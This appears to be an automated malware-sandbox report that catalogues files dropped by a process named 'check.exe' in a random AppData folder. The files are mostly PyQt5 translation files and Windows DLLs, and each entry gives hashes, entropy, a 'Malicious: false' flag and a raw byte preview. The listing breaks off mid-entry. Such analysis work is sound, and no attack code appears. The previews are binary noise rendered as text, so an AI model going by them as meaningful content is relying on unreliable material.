Preview:	<.d....!..`.......he_ILB../....*......+..Sw...@......A......B.......C.......D...X...E.......F.../...G...O...H...o...I......P.......Q.......R...I...S...i...T......U......V.......W.......X.../...Y...O...]..$....s......t..X:.......4......`Y...;..$....;..%....;.......;...5...;.......M..$....O...6...O..s............}..%-...........=...m...m..%k...t..........^..(5......+;..2...+;..^...+O...N..1.......D@......E@...(..H4..T...HY..L...H..._...IC..\...J...\...J.......J...\j..LD..^...L...^o..PS..fl..QR......R...Q...T...su..U...s...X...x3..Zr..~...[`..L\..\.......]x....._......._....o..yg...(..1...3....E..5C.......z......?V......U.......U.......W....$..M....[..W....,..X....y.......y..\........a..............\@...9..NO...E...?......]s...z...G.......(......^....%..B^...D.._......._.................... ..........5..`/...0.......0...L...0......0..d(...0......5..ek...5..........fB......R... D..&O.. D..K...+...l...<U......<U..p)..<...p...H5..&w..H5..La..L...s...VE......VE......V.....

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qtbase_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	160494
Entropy (8bit):	4.831791320613137
Encrypted:	false
SSDEEP:	3072:BmOMZadV9n51xXeQvjOiIzz7/Vs9Db3ihuJNvMfWxBNlYzYbTrIkfwb03l24cNKu:HkWa5pg0MahBHDd
MD5:	E9D302A698B9272BDA41D6DE1D8313FB
SHA1:	BBF35C04177CF290B43F7D2533BE44A15D929D02
SHA-256:	C61B67BB9D1E84F0AB0792B6518FE055414A68E44D0C7BC7C862773800FA8299
SHA-512:	12947B306874CF93ABA64BB46FAC48179C2D055E770D41AF32E50FFFB9F0C092F583AFCEA8B53FE9E238EF9370E9FFFBEB581270DFA1A7CB74EBE54D9BFF459F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......hu_HUB../...........+.......@.......A...0...B...{...C.......D.......E.......F.......G...<...H...`...I.......P...s...Q.......R.......S.......T......U...N...V.......W.......X.......Y.......]..+y...s.......t.......................;..+Q...;..,U...;.......;.......;..&....M..+....O.......O...U..........}..+............=.......m..+....t..........9c..(5..,...+;..;...+;..m7..+O......1...9...D@...T..E@......H4...v..HY..Y...H.......IC......J.......J.......J.......LD......L.......PS...}..QR..!...R...]...T.......U....{..X.......Zr...=..[`......\......]x...-.._......._......yg...M..1...<....E..>...............J........T.......(.......S...$..Z....[.......,...u...y.......y...[...............#...........9..Z....E..#&...........z..!'...................%..Mv...D..._....................32.....5......9....5.......0...h...0...E...0.......0.......0..#....5...Z...5...........G......_2.. D..,... D..W...+....W..<U......<U...B..<.......H5..,...H5..X{..L....)..VE.."...VE..6l..V.....

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qtbase_it.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	161172
Entropy (8bit):	4.680034416311688
Encrypted:	false
SSDEEP:	1536:eSfxfdO4BKJb0td5pqCOIUP/PFIM7gxGQ9sRrFM6QJ4m8ihkM:eSfxFO4BKJb0td5pnOrvCqg9mRK4IkM
MD5:	88D040696DE3D068F91E0BF000A9EC3E
SHA1:	F978B265E50D14FDDE9693EC96E99B636997B74D
SHA-256:	7C7DC8B45BF4E41FEC60021AB13D9C7655BE007B8123DB8D7537A119EB64A366
SHA-512:	F042637B61C49C91043D73B113545C383BD8D9766FD4ACC21675B4FF727652D50863E72EA811553CB26DF689F692530184A6CE8FE71F9250B5A55662AFE7D923
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......it_ITB../....*.......+.......@.......A..."...B...m...C.......D.......E.......F.......G...0...H...T...I...x...P...q...Q.......R.......S.......T...(...U...L...V.......W.......X.......Y.......]..+....s...'...t...................^...;..+[...;..,g...;.......;.......;..!B...M..+....O...D...O...........(...}..+........I...=.......m..,....t..........4...(5..'...+;..<...+;..oV..+O......1...5...D@...F..E@......H4...J..HY..Z...H.......IC...L..J....s..J....j..J.......LD......L....f..PS......QR..!...R..._...T.......U....3..X.......Zr......[`...Q..\.......]x......_......._....0..yg...C..1...=....E..?o..............Kf.......h.......8.......I...$..[....[.......,...m...y...9...y...........z.......z...........9..\=...E..$u.......:...z.. k...................%..N....D..................M............0......5/...5...2...0.......0...0...0...A...0...)...0..$....5.......5...J.......a......a... D..,... D..Y...+.......<U......<U......<....v..H5..-...H5..Z...L.......VE.."c..VE..1...V....X.

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qtbase_ja.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	129911
Entropy (8bit):	5.802855391832282
Encrypted:	false
SSDEEP:	1536:W8YYSCjKBJ26c1Z7f25pVmuLXpxfqt7FEUWNrfQje9kWI23pKXvx:xYuKBJ01Z7u5pQuLbESUWNzAAI23pKfx
MD5:	608B80932119D86503CDDCB1CA7F98BA
SHA1:	7F440399ABA23120F40F6F4FCAE966D621A1CC67
SHA-256:	CBA382ACC44D3680D400F2C625DE93D0C4BD72A90102769EDFD1FE91CB9B617B
SHA-512:	424618011A7C06748AADFC2295109D2D916289C81B01C669DA4991499B207B781604A03259C546739A3A6CF2F8F6DFA753B23406B2E2812F5407AEE343B5CBDD
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......jaB../....*...'...+..=....@.......A.......B...?...C...c...D......E......F.......G.......H..."...I...F...P.......Q...'...R...r...S......T......U.......V...8...W...\...X......Y......].."k...s...Q...t..A...............I....;.."C...;..#A...;.......;.......;.......M.."....O...B...O..[?......h....}.."........m...=.......m.."....t...........M..(5......+;......+;..WU..+O......1.......D@......E@...K..H4..>=..HY..F...H...Hr..IC..E...J...F...J.......J...E...LD..Gz..L...G...PS..O...QR......R...K!..T...Z...U...[e..X..._f..Zr..e...[`..7...\...i...]x...'.._......._...j...yg..~+..1.../....E..1?.......#......:.......?.......?n......A....$..G....[..Ap...,..B....y.......y..Ew......\|...............E....9..H....E..........F....z...]..............HL...%..=R...D..H.......I!......[......J......M..........5..It...0...3...0.......0...C...0..M....0...a...5..N....5..........N.......L6.. D..#... D..E...+...U%..<U......<U..X ..<...X...H5..#...H5..FK..L...[...VE......VE......V......f.

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qtbase_ko.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	156799
Entropy (8bit):	5.859529082176036
Encrypted:	false
SSDEEP:	1536:rvTy18hhPekHs1iNXVExWbStnn8TExgkYOvYejZOvXx4Mmf0MwUL8smk/pDZyy:y18hJ61nMStnn8TOgknQRLWZmkxNyy
MD5:	082E361CBAC2E3A0849F87B76EF6E121
SHA1:	F10E882762DCD2E60041BDD6CC57598FC3DF4343
SHA-256:	0179ED1B136E1CB3F583351EAA2C545BA3D83A6EE3F82C32505926A1A5F5F183
SHA-512:	F378A42116924E30FA0B8FFF1D3C3CB185DC35B2746DCE2818BE7C2AA95C5DE103DF44AAC74DA969C36C557F1D4DE42AC7647EC41066247F8AD2697BDED667EA
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......koB..7...........+.......@...K...A...o...B......C.......D...8...E.......F...U...G...y...H......I.......P......Q.......R.......S...C...T...g...U.......V.......W.......X...-...Y...Q...]..$....s...>...t...................y...;..${...;..%....;...u...;...l...M..$....O.......O...8...........}..$............=...C...m..%!...t...n..........(5...a..+;..E@..+;..l\|..+O......1.......D@.....E@......H4......HY..\...H....]..IC......J.......J....8..J.......LD...a..L.......PS......QR......R...`...T.......U....^..U.......X....y..Zr......[`..y...\....A..]x......_......._....o..yg......1...FJ...E..HE...7..................Q........a.......5...........$..]....[...;...,.......y.......y...V...............!.......\|...9..]....E...R...........z...4.......f.......5...%..Te...D..................D......^................5...S...0.......0.......0.......0.......5.......5...........n......a... D..%... D..[...+.......<?......<U...;..<U...+..<.......H5..&...H5..\...L.......VE......V....A..f.

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qtbase_lv.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153608
Entropy (8bit):	4.843805801051326
Encrypted:	false
SSDEEP:	3072:y5pmbKIhooMbGe91MrjOhmGzP6LJbWz5XIxELpU6:yObeqrjPGzeJyJLy6
MD5:	BD8BDC7BBDB7A80C56DCB61B1108961D
SHA1:	9538C4D8BB9A95C0D9DC57C7708A99DD53A32D1F
SHA-256:	846E047573AE40C83671C3BA7F73E27EFC24B98C82701DA0DF9973E574178BB2
SHA-512:	F040EC410EBFEA21145F944E71ADCAE8E5F60907D1D3716A937A9A59A48F70C6B7EAAC91C2C554F59357A7BC820CDBD17C73A4DECC20B51F68EB79EDD35C5554
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......lv_LVB..........B...+..y....@.......A...=...B......C......D.......E.......F...#...G...G...H...k...I.......P...~...Q......R.......S.......T...5...U...Y...V......W.......X.......Y.......]..%....s.......t...8.......n.......A...;..&....;.......;...!...;...A...;../....M..%....O.......O...............}..%...........=.......m..&....t...(......(g..(5...+..+;..4...+;..d...+O......1...(...D@...a..E@......H4..z...HY..Q...H.......IC......J....6..J.......J.......LD......L....9..PS......QR......R...U...T....S..U.......X...._..Zr......[`..r...\.......]x....._......._....{..yg......1...5v...E..7........(......B.......\|.......\|W......~r...$..R....[..~....,.......y...l...y...............................9..S....E...g...........z...z...................%..F....D........................"Z.....$......)....5.......0...\...0.......0...r...0.......0.......5...a...5..........J......V... D..&... D..P...+.......<U......<U......<.......H5..'"..H5..P...L....~..VE...R..VE..%...V......

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qtbase_pl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	162982
Entropy (8bit):	4.841899887077422
Encrypted:	false
SSDEEP:	1536:sXpestp/YIFtDT8FIWYbIJmPYuIpnmxAk6mwyJNqSm9+P:sxpTDT8FIWfJmdCmxApmbnqSm9+P
MD5:	F9475A909A0BAF4B6B7A1937D58293C3
SHA1:	76B97225A11DD1F77CAC6EF144812F91BD8734BD
SHA-256:	CE99032A3B0BF8ABAD758895CC22837088EAD99FD2D2514E2D180693081CFE57
SHA-512:	8A4F1B802B6B81FF25C44251FB4A880E93E9A5FE25E36825A24BFE0EFB34E764E7E1EE585D3A56554964B7921E7813C67F12D200D6E0C5EAF4BB76B064B5C890
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......pl_PLB..0......"....+.......@...F...A...j...B......C.......D...3...E.......F...P...G...t...H.......I.......P.......Q.......R.......S...>...T...b...U.......V.......W.......X...(...Y...L...]......s.......t...r.......o.......+...;......;..+....;..."...;... ...M......O...6...O...........a...}..+...........=.......m..+G...t...G......,...(5......+;..:...+;..k...+O......1...-[..D@.....E@......H4...U..HY..WU..H.......IC......J....6..J.......J.......LD......L....%..PS......QR.. ...R...[...T....1..U.......X......Zr......[`......\.......]x...A.._......._....}..yg......1...;W...E..=........%......H....................$..Xp...[.......,.......y...i...y...........}......$R...........9..X....E..+)...........z.. E...................%..K....D...p....................&......(......-....5.......0.......0...e...0.......0..+....5...]...5...........f......]-.. D..,%.. D..V?..+....V..<U......<U......<....-..H5..,M..H5..V...L....Z..VE..!...VE..)...V.......f...P...f....K..f......

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qtbase_ru.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	203767
Entropy (8bit):	5.362551648909705
Encrypted:	false
SSDEEP:	1536:hn4dEJ63pdhPpy6gu5fs4MHQv6sLlxnrncF423ZL9xyuXwdcX8LZuf76CW+WeXFx:aN3pdV5fZbpItXsttRY+WSq
MD5:	5096AD2743BF89A334FBA6A2964300D4
SHA1:	405F45361A537C7923C240D51B0FF1C46621C203
SHA-256:	3DA6605668F9178D11A838C4515478084DCFB4F9CF22F99D7A92B492DB9C224B
SHA-512:	7B88B501792B5831426BAA669138192ED94CC3F8323A3DF9D5287655DC4D877706908C517AB7523AE8A283BF50B47123F13B8AE40EA2F3081C3459EDC47FC8DD
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ru_RUB..7.......L...+...W...@..,....A..,....B..-1...C..-U...D..-....E...r...F.......G.......H../....I../8...P..1'...Q..1K...R..1....S..1....T..1....U..2....V..2\...W..2....X..2....Y..2....].......s..$c...t...'......%........r...;..-....;.......;..J....;..V....M...C...O.......O..&.......8....}...m......+3...=..+....m.......t..+.......p...(5..]@..+;..[0..+;......+O..H...1...qM..D@..-...E@..1o..H4...p..HY..xm..H......IC...@..J....g..J.......J.......LD......L....p..PS......QR..!...R...}...T...&...U...'...U...ki..X...+...Zr..3...[`......\...:...]x..)..._......._...;...yg..S...1...\....E..__...7.........H.......k................j.......U...$..y....[.......,.......y...k...y...............................9..y....E...O...........z..!*...................%..nW...D.................%w.....g......j~.....qw...5...H...0.......0..I....0..._...0......5.......5..................~... D../k.. D..wa..+....?..<?.."t..<U......<U.."...<...#z..H5../...H5..w...L...&...VE.."...V...F$.

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qtbase_sk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	125763
Entropy (8bit):	4.80343609423322
Encrypted:	false
SSDEEP:	3072:roXDuC1u/2lUBGjJirE5tsd/aev1GIfOdvhw:OucMGjH5tbm
MD5:	3D60E50DCBCBD70EE699BC9B1524FCB9
SHA1:	0211B4911B5B74CC1A46C0FCA87D3BF5632AA44A
SHA-256:	D586AE2C314074CF398417FDECB40709D5478DFEB0A67C2FE60D509EE9B59ED7
SHA-512:	F98211867F1DBCB8A342C00E23FA5718BE6E999F7449CB8470B41BF0F527C7F78CC4D6666E28968F32E96026907156753979BFADA7E6BF4225D02A902D24906D
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......sk_SKB..$x...*.......+..>....@......A......B.......C.......D...3...E...Z...F......G......H.......I.......P.......Q...D...R.......S......T.......U.......V...1...W...X...X.......Y......]...Y...t..D-......K....;...3...;.......;.......;......;...V...M.......O.._ ......l....}.......m...........T..(5...(..+;......+;..%...+O......1......E@...k..F.......H4..?I..HY..@7..H...J...I....,..IC..HT..J...H{..J...H...LD..J"..L...Jv..PS..Q...R...D...Zr..i]..[`..7...\...nB.._...o...1...&....E..(........B......19......A.......A....$..AF...[..C....,..D....y..G.......v........g......G....9..A....E..........IH...%..4.......Kf..............................5..K....0...,...0.......0.......0..Of...0.......5..P....5..........E... D...C.. D..?'..+...Y`..<U......<U..\...<...]...H5...m..H5..?...L...^...VE......f.......f...8...g.......l...aP.......................6......d....D..f(...`..f...............?....`..h5...y..H....5..j........E...e.......e..@....... ......>......oZ......l..

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qtbase_tr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	194487
Entropy (8bit):	4.877239354585035
Encrypted:	false
SSDEEP:	3072:yRRhAFCvqDBitD/iDG9AOH+l4TcwZBPqHo9fd9CFRK+2IKAimxsjucV2p0ZqvRu7:yRRHs5mksWVX3lA3
MD5:	6CBC5D8E1EABEC96C281065ECC51E35E
SHA1:	4E1E6BA3772428227CB033747006B4887E5D9AD1
SHA-256:	6A0BF6E70E7920C2B193E76E92F78F315936955D3B06AC039D917F2E06C43281
SHA-512:	CE1F9EE180176153D5F523D71E0DB06F4DEA65C24E5E2CD56341CFAEE349A8E9A0F606D99F7219A35DD4516D1528C90AEA4BB87548A55392B8F2B36164D478B1
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......tr_TRB..7....*.......+...-...@.......A.......B.......C...%...D.......E...F...F.......G.......H.......I.......P.. ....Q.. ....R..!D...S..!h...T..!....U..!....V.."....W.."0...X.."T...Y.."x...]..,g...s.../...t......................;..,9...;..-I...;..9@...;..E....M..,....O.......O...G...........}..,............=...\...m..,....t.........._3..(5..LJ..+;..Wt..+;...\..+O..7...1..._...D@......E@..!...H4...@..HY..t...H....2..IC...r..J......J....D..J....K..LD...$..L....x..PS......QR..!...R...x...T.......U....q..U...Y...X...."..Zr...%..[`......\....:..]x......_......._.......yg..6...1...X....E..[....7...Z......7Q......f............................$..u....[...:...,...5...y.......y...........7...............!...9..u....E...........P...z.. ........p...........%..j....D..................A.....U......Y......_....5...V...0.......0..8....0...U...0.......5.......5..~b..............z+.. D..-... D..s...+.......<?...8..<U...s..<U...p..<.......H5..-...H5..s...L.......VE.."0..V...4..

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qtbase_uk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	158274
Entropy (8bit):	5.402056706327934
Encrypted:	false
SSDEEP:	1536:jXwjFVUDdMUD4TzdAhpQgO5poZHvJllEnhmdK4I77/dnPJX/imfb1jhvv3BxT8ue:jBzD4Tzaw5pCvJ8hVPdlvj3p8
MD5:	D6234E4E21021102B021744D5FA22346
SHA1:	63A14327D0CF0941D6D6B58BFA7E8B10337F557B
SHA-256:	51B8FF55B37DC5907D637A8DDDA12FBE816852B0244C74EB4F0FB84867A786E0
SHA-512:	37D24A092C5F29BACB7A4CA8207C4EEFD0F073B7E74A492402867F758084091BF1D79D2BA2B4A28B35FEF42E8023C371FDE97578F74BB2033551154E77102DE6
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......uk_UAB../.......E...+...l...@.......A.......B...G...C...k...D.......E.......F.......G.......H......I...N...P...=...Q...a...R.......S.......T.......U.......V...r...W.......X.......Y.......]..y...s.......t...........;.......n...;..Q...;..+U...;.......;...x...;..!(...M......O.......O...........6...}..........E...=.......m..*....t..........3...(5..&...+;..:...+;..k0..+O...A..1...4-..D@... ..E@......H4...8..HY..W...H....2..IC...V..J....}..J.......J....%..LD...&..L....z..PS......QR.. ...R...\...T....(..U.......X.......Zr......[`..~...\.......]x......_......._....4..yg...c..1...;....E..=w.......m......I............................$..X....[...<...,.......y.......y...........M...................9..Y....E...F.......D...z.. ........P...........%..LB...D.......................-n...../......4W...5...F...0...p...0...W...0.......0...k...0.......5.......5..................^... D..+... D..V...+.......<U.../..<U......<....>..H5..+...H5..V...L....S..VE..!...VE..0...V......

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\translations\qtbase_zh_TW.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	127849
Entropy (8bit):	5.83455389078597
Encrypted:	false
SSDEEP:	3072:Fv2cHP10gOs6dcFxsJopMqOWv2WIrPFP8pa:Fh6s6iFxEodjef8pa
MD5:	9C6A3721D01ECAF3F952CE96F46CE046
SHA1:	4A944E9E31DF778F7012D8E4A66497583BFD2118
SHA-256:	085D29EAF9BBB788B2F2503D74A1EF963A9411CEB600441254CE49A120E1AB63
SHA-512:	6E2807B8785F42A26C9CCBDBA0327DD40B529B10C468593F0E74113774D1CCDAA4FD9ACE9B259B9040E1475911428ECAEA49425B0F170862CF8147D23DB48E46
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zh_TWB..2x..........+..)....@.......A.......B...j...C......D.......E......F.......G...)...H...M...I...q...P...%...Q...I...R......S......T.......U.......V...Z...W...~...X......Y.......]..!....s.......t..-...............4....;..!z...;.."\|...;.......;.......M..!....O.......O..Ay......N)...}..!............=.......m.." ...t...(.........(5......+;..;...+;.._...+O......1.......D@...C..E@...m..H4..W..HY..Pm..H...3...IC..1...J...1...J.......J...1...LD..2...L...38..PS..6...QR...T..R...T...T...A...U...A...X...E...Zr..K...[`..$...\...OW..]x......_......._...P...yg..a^..1...<....E..>....7...>.......;......Fo......+.......+.......-L...$..QR...[..-....,...F...y.......y..1J...............6......1p...9..Q....E..........2....z...........<......3....%..H....D..4W......4}....................Z...... ...5..4....0...?...0...K...0..5....0...L...5..6....5..........6.......U... D.."... D..O...+...<%..<U......<U..>...<...?:..H5..#...H5..O...L...AS..VE...M..VE......V.......f...L..

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\QtCore.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2483712
Entropy (8bit):	6.241719144701645
Encrypted:	false
SSDEEP:	49152:ZYS8YHrNj4/7RsRLvYpiW3pCBU+Z7bJWvCSBYgbxGJ5M2GM/fXR1fUdihfSbCo6e:9bpj4/7RsRLvYpiW3pCBU+Z7bJWvCSBv
MD5:	678FA1496FFDEA3A530FA146DEDCDBCC
SHA1:	C80D8F1DE8AE06ECF5750C83D879D2DCC2D6A4F8
SHA-256:	D6E45FD8C3B3F93F52C4D1B6F9E3EE220454A73F80F65F3D70504BD55415EA37
SHA-512:	8D9E3FA49FB42F844D8DF241786EA9C0F55E546D373FF07E8C89AAC4F3027C62EC1BD0C9C639AFEABC034CC39E424B21DA55A1609C9F95397A66D5F0D834E88E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.........../....td./..../...td./...td./...td./...n../...1../......P...c./....c./....c./...Rich...........................PE..d....p.f.........." ...(............+.......................................0&...........`.............................................L.....................#.$.............%.... t.......................t..(....r..@............@..(o...........................text...~(......................... ..`.rdata..x....@......................@..@.data...h...........................@....pdata..$.....#......n#.............@..@.reloc.......%......L%.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\QtGui.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2494976
Entropy (8bit):	6.232020603277999
Encrypted:	false
SSDEEP:	24576:SUjOoTFrwI8nc6EmRAQ9RzgpP2bXYUKuXeLQp5PjYq0zb:SUqCgnZXRAQ9RzggbozJLQp5Mq
MD5:	AE182C36F5839BADDC9DCB71192CFA7A
SHA1:	C9FA448981BA61343C7D7DECACAE300CAD416957
SHA-256:	A9408E3B15FF3030F0E9ACB3429000D253D3BB7206F750091A7130325F6D0D72
SHA-512:	8950244D828C5EDE5C3934CFE2EE229BE19CC00FBF0C4A7CCEBEC19E8641345EF5FD028511C5428E1E21CE5491A3F74FB0175B03DA17588DAEF918E3F66B206A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......... j..sj..sj..sc..sn..s.p.rh..s1..rh..s.p.ri..s.p.rb..s.p.r...s...rh..s..ro..sj..s...syw.ra..syw.rk..syw.rk..sRichj..s........PE..d....p.f.........." ...(.....................................................P&...........`.........................................`&..L....&................$...............%.....................................p...@...............@{...........................text...O........................... ..`.rdata..............................@..@.data...xz.......^...t..............@....pdata........$.......#.............@..@.reloc........%......^%.............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\QtWidgets.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5144576
Entropy (8bit):	6.262739223310643
Encrypted:	false
SSDEEP:	49152:Qi+reIG7QwktsFPKoe2yicbbqgkcY9abW7KnTYK2bjMkTDGM7y:uqT7Q1kyTvoWW7EYvM9M
MD5:	E8C3BFBC19378E541F5F569E2023B7AA
SHA1:	ACA007030C1CEE45CBC692ADCB8BCB29665792BA
SHA-256:	A1E97A2AB434C6AE5E56491C60172E59CDCCE42960734E8BDF5D851B79361071
SHA-512:	9134C2EAD00C2D19DEC499E60F91E978858766744965EAD655D2349FF92834AB267AC8026038E576A7E207D3BBD4A87CD5F2E2846A703C7F481A406130530EB0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................=....1M............1M.....1M.....1M.....+......t.............J......J......J.....Rich...........................PE..d....p.f.........." ...(..,...!.....P.,.......................................N...........`..........................................><.T...D?<...............H..z...........pM..O..Pa8..............................`8.@.............,..............................text.....,.......,................. ..`.rdata........,.......,.............@..@.data... :....A.......A.............@....pdata...z....H..\|....H.............@..@.reloc...O...pM..P...0M.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\sip.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120320
Entropy (8bit):	6.034057886020456
Encrypted:	false
SSDEEP:	1536:pPd5NTdYgpmMrZhekwFH4PqgZNBQmT6V6WRFYE9Icx7pz4H5B:NhTdtmMdEkwuFTSvYE9Iczz4H5
MD5:	4F7F9E3A9466F4C0103FB04E1987E098
SHA1:	D4A339702E936AA5ECC1FE906AE2BA3BB0E481D7
SHA-256:	EBF27146466D61411493D2E243EAC691740F9C4B7A4B9AB0D408BE45B5E0AA35
SHA-512:	920BA8D58DCA7946341C1CC01FEA0B76CCE008F1D10061F84455A3DE9BA00FD9534F40C983486211BE92B85F786CD610C386529711A6F573A02BFAF8CA543A19
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........kSR...R...R...[...Z....X..P.......P....X..Q....X..Z....X.._....^..Q...R.......G_..[...G_..S...G_..S...G_..S...RichR...........PE..d.... g.........." ...(.H...........J.......................................0............`.............................................X...h................................ ..........................................@............`...............................text...(G.......H.................. ..`.rdata..lU...`...V...L..............@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120400
Entropy (8bit):	6.6017475353076716
Encrypted:	false
SSDEEP:	1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:	862F820C3251E4CA6FC0AC00E4092239
SHA1:	EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:	36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:	2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............\|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\VCRUNTIME140_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	6.701724666218339
Encrypted:	false
SSDEEP:	768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
MD5:	68156F41AE9A04D89BB6625A5CD222D4
SHA1:	3BE29D5C53808186EBA3A024BE377EE6F267C983
SHA-256:	82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
SHA-512:	F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......\|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\_bz2.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
